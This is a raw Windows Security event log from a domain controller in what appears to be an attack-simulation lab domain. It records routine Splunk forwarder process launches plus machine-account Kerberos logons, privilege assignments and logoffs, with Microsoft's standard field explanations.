Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:38:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264813
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1af0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:38:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264815
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xfe8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:38:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264816
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1754
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:38:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264818
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x338
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:38:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264817
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1858
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:38:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264821
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8754C4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:38:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264820
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8754C4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53726
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:38:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264819
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8754C4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:39:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264828
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x875FB4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 53730
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:39:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264827
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x875FB4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:39:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264826
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x875F6C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:39:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264825
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x875F6C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:39:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264824
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x875E7E
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53729
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:39:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264823
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x875E7E
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:39:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264822
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xcc4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264835
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264834
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x158c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264833
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x875E7E
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264832
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x875F6C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264831
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x875FB4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264830
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x876089
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53733
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:39:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264829
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x876089
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:39:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264836
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:39:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264837
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x56c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
